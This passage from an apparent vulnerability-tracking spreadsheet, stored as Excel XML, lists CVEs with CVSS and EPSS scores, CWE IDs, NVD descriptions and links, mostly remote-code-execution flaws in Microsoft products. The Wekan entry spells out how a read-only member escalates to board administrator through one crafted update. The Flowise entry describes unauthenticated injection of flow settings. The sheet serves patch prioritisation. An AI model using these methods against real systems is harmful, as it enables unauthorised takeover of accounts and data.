        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L839" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M839" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67384</t>
        </is>
      </c>
    </row>
    <row r="840">
      <c r="A840" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B840" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67385</t>
        </is>
      </c>
      <c r="C840" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D840" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E840" s="5" t="inlineStr"/>
      <c r="F840" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G840" s="5" t="inlineStr"/>
      <c r="H840" s="5" t="inlineStr"/>
      <c r="I840" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J840" s="5" t="inlineStr"/>
      <c r="K840" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L840" s="5" t="inlineStr">
        <is>
          <t>Use after free in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M840" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67385</t>
        </is>
      </c>
    </row>
    <row r="841">
      <c r="A841" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B841" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67388</t>
        </is>
      </c>
      <c r="C841" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D841" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E841" s="5" t="inlineStr"/>
      <c r="F841" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G841" s="5" t="inlineStr"/>
      <c r="H841" s="5" t="inlineStr"/>
      <c r="I841" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J841" s="5" t="inlineStr"/>
      <c r="K841" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L841" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M841" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67388</t>
        </is>
      </c>
    </row>
    <row r="842">
      <c r="A842" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B842" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67631</t>
        </is>
      </c>
      <c r="C842" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D842" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E842" s="5" t="inlineStr"/>
      <c r="F842" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G842" s="5" t="inlineStr"/>
      <c r="H842" s="5" t="inlineStr"/>
      <c r="I842" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J842" s="5" t="inlineStr"/>
      <c r="K842" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L842" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M842" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67631</t>
        </is>
      </c>
    </row>
    <row r="843">
      <c r="A843" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B843" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67638</t>
        </is>
      </c>
      <c r="C843" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D843" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E843" s="5" t="inlineStr"/>
      <c r="F843" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G843" s="5" t="inlineStr"/>
      <c r="H843" s="5" t="inlineStr"/>
      <c r="I843" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J843" s="5" t="inlineStr"/>
      <c r="K843" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L843" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M843" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67638</t>
        </is>
      </c>
    </row>
    <row r="844">
      <c r="A844" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B844" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67639</t>
        </is>
      </c>
      <c r="C844" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D844" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E844" s="5" t="inlineStr"/>
      <c r="F844" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G844" s="5" t="inlineStr"/>
      <c r="H844" s="5" t="inlineStr"/>
      <c r="I844" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J844" s="5" t="inlineStr"/>
      <c r="K844" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L844" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M844" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67639</t>
        </is>
      </c>
    </row>
    <row r="845">
      <c r="A845" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B845" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67642</t>
        </is>
      </c>
      <c r="C845" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D845" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E845" s="5" t="inlineStr"/>
      <c r="F845" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G845" s="5" t="inlineStr"/>
      <c r="H845" s="5" t="inlineStr"/>
      <c r="I845" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J845" s="5" t="inlineStr"/>
      <c r="K845" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L845" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M845" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67642</t>
        </is>
      </c>
    </row>
    <row r="846">
      <c r="A846" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B846" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67643</t>
        </is>
      </c>
      <c r="C846" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D846" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E846" s="5" t="inlineStr"/>
      <c r="F846" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G846" s="5" t="inlineStr"/>
      <c r="H846" s="5" t="inlineStr"/>
      <c r="I846" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J846" s="5" t="inlineStr"/>
      <c r="K846" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L846" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M846" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67643</t>
        </is>
      </c>
    </row>
    <row r="847">
      <c r="A847" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B847" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68561</t>
        </is>
      </c>
      <c r="C847" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D847" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E847" s="5" t="inlineStr"/>
      <c r="F847" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G847" s="5" t="inlineStr"/>
      <c r="H847" s="5" t="inlineStr"/>
      <c r="I847" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J847" s="5" t="inlineStr"/>
      <c r="K847" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-863</t>
        </is>
      </c>
      <c r="L847" s="5" t="inlineStr">
        <is>
          <t>Wekan is open source kanban built with Meteor. Prior to 9.89, the second Boards.allow({ update }) rule in server/permissions/boards.js called canUpdateBoardSort in server/lib/utils.js, which authorized any board member whenever fieldNames included sort. Because Meteor combines allow rules with OR semantics and applies the complete modifier, a comment-only or read-only member could send one Boards.update with $set values for sort, members, permission, and title, make themselves the sole board administrator, expose a private board, and evict the legitimate owner; the last-admin deny rule inspected only $pull and did not block a wholesale $set of members. Version 9.89 requires sort to be the only modified field and rejects $set member arrays that remove the last active administrator. This issue is fixed in version 9.89.</t>
        </is>
      </c>
      <c r="M847" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68561</t>
        </is>
      </c>
    </row>
    <row r="848">
      <c r="A848" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B848" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68775</t>
        </is>
      </c>
      <c r="C848" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D848" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E848" s="5" t="inlineStr"/>
      <c r="F848" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G848" s="5" t="inlineStr"/>
      <c r="H848" s="5" t="inlineStr"/>
      <c r="I848" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J848" s="5" t="inlineStr"/>
      <c r="K848" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L848" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M848" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68775</t>
        </is>
      </c>
    </row>
    <row r="849">
      <c r="A849" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B849" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68786</t>
        </is>
      </c>
      <c r="C849" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D849" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E849" s="5" t="inlineStr"/>
      <c r="F849" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G849" s="5" t="inlineStr"/>
      <c r="H849" s="5" t="inlineStr"/>
      <c r="I849" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J849" s="5" t="inlineStr"/>
      <c r="K849" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L849" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M849" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68786</t>
        </is>
      </c>
    </row>
    <row r="850">
      <c r="A850" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B850" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68828</t>
        </is>
      </c>
      <c r="C850" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D850" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E850" s="5" t="inlineStr"/>
      <c r="F850" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G850" s="5" t="inlineStr"/>
      <c r="H850" s="5" t="inlineStr"/>
      <c r="I850" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J850" s="5" t="inlineStr"/>
      <c r="K850" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L850" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M850" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68828</t>
        </is>
      </c>
    </row>
    <row r="851">
      <c r="A851" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B851" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69258</t>
        </is>
      </c>
      <c r="C851" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D851" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E851" s="5" t="inlineStr"/>
      <c r="F851" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G851" s="5" t="inlineStr"/>
      <c r="H851" s="5" t="inlineStr"/>
      <c r="I851" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J851" s="5" t="inlineStr"/>
      <c r="K851" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-915</t>
        </is>
      </c>
      <c r="L851" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, the unauthenticated POST /api/v1/prediction/:id endpoint accepted an overrideConfig object and unconditionally spread it into internal flowConfig and flowData objects in packages/server/src/utils/buildChatflow.ts and packages/server/src/utils/index.ts without checking apiOverrideStatus. This allowed unauthenticated attackers to inject arbitrary properties into the flow execution context of any public chatflow, overwrite values such as chatId, sessionId, and chatHistory, and control values resolved through $flow.* template variables consumed by flow nodes. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M851" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69258</t>
        </is>
      </c>
    </row>
    <row r="852">
      <c r="A852" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B852" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69266</t>
        </is>
      </c>
      <c r="C852" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D852" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E852" s="5" t="inlineStr"/>
      <c r="F852" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G852" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H852" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I852" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J852" s="5" t="inlineStr"/>
      <c r="K852" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L852" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M852" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69266</t>
        </is>
      </c>
    </row>
    <row r="853">
      <c r="A853" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B853" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69268</t>
        </is>
      </c>
      <c r="C853" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D853" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E853" s="5" t="inlineStr"/>
      <c r="F853" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G853" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H853" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I853" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J853" s="5" t="inlineStr"/>
      <c r="K853" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L853" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M853" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69268</t>
        </is>
      </c>
    </row>
    <row r="854">
      <c r="A854" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B854" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69273</t>
        </is>
      </c>
      <c r="C854" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D854" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E854" s="5" t="inlineStr"/>
      <c r="F854" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G854" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H854" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I854" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J854" s="5" t="inlineStr"/>
      <c r="K854" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L854" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M854" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69273</t>
        </is>
      </c>
    </row>
    <row r="855">
      <c r="A855" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B855" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69282</t>
        </is>
      </c>
      <c r="C855" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D855" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E855" s="5" t="inlineStr"/>
      <c r="F855" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G855" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H855" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I855" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J855" s="5" t="inlineStr"/>
      <c r="K855" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L855" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M855" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69282</t>
        </is>
      </c>
    </row>
    <row r="856">
      <c r="A856" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B856" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69285</t>
        </is>
      </c>
      <c r="C856" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D856" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E856" s="5" t="inlineStr"/>
      <c r="F856" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G856" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H856" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I856" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J856" s="5" t="inlineStr"/>
      <c r="K856" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L856" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M856" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69285</t>
        </is>
      </c>
    </row>
    <row r="857">
      <c r="A857" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B857" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69291</t>
        </is>
      </c>
      <c r="C857" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D857" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E857" s="5" t="inlineStr"/>
      <c r="F857" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G857" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H857" s="5" t="inlineStr"/>
      <c r="I857" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J857" s="5" t="inlineStr"/>
      <c r="K857" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L857" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M857" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69291</t>
        </is>
      </c>
    </row>
    <row r="858">
      <c r="A858" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B858" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69334</t>
        </is>
      </c>
      <c r="C858" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D858" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E858" s="5" t="inlineStr"/>
      <c r="F858" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G858" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H858" s="5" t="inlineStr"/>
      <c r="I858" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J858" s="5" t="inlineStr"/>
      <c r="K858" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="L858" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M858" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69334</t>
        </is>
      </c>
    </row>
    <row r="859">
      <c r="A859" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B859" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69355</t>
        </is>
      </c>
      <c r="C859" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D859" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E859" s="5" t="inlineStr"/>
      <c r="F859" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G859" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H859" s="5" t="inlineStr"/>
      <c r="I859" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J859" s="5" t="inlineStr"/>
      <c r="K859" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L859" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in Microsoft Exchange Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M859" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69355</t>
        </is>
      </c>
    </row>
    <row r="860">
      <c r="A860" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B860" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69360</t>
        </is>
      </c>
      <c r="C860" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D860" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E860" s="5" t="inlineStr"/>
      <c r="F860" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G860" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H860" s="5" t="inlineStr"/>
      <c r="I860" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J860" s="5" t="inlineStr"/>
      <c r="K860" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L860" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M860" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69360</t>
        </is>
      </c>
    </row>
    <row r="861">
      <c r="A861" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B861" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69386</t>
        </is>
      </c>
      <c r="C861" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D861" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E861" s="5" t="inlineStr"/>
      <c r="F861" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G861" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H861" s="5" t="inlineStr"/>
      <c r="I861" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J861" s="5" t="inlineStr"/>
      <c r="K861" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L861" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M861" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69386</t>
        </is>
      </c>
    </row>
    <row r="862">
      <c r="A862" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B862" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69434</t>
        </is>
      </c>
      <c r="C862" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D862" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E862" s="5" t="inlineStr"/>
      <c r="F862" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G862" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H862" s="5" t="inlineStr"/>
      <c r="I862" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J862" s="5" t="inlineStr"/>
      <c r="K862" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L862" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows URL Moniker allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M862" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69434</t>
        </is>
      </c>
    </row>
    <row r="863">
      <c r="A863" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B863" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69439</t>
        </is>
      </c>
      <c r="C863" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D863" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E863" s="5" t="inlineStr"/>
      <c r="F863" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G863" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H863" s="5" t="inlineStr"/>
      <c r="I863" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J863" s="5" t="inlineStr"/>
      <c r="K863" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L863" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
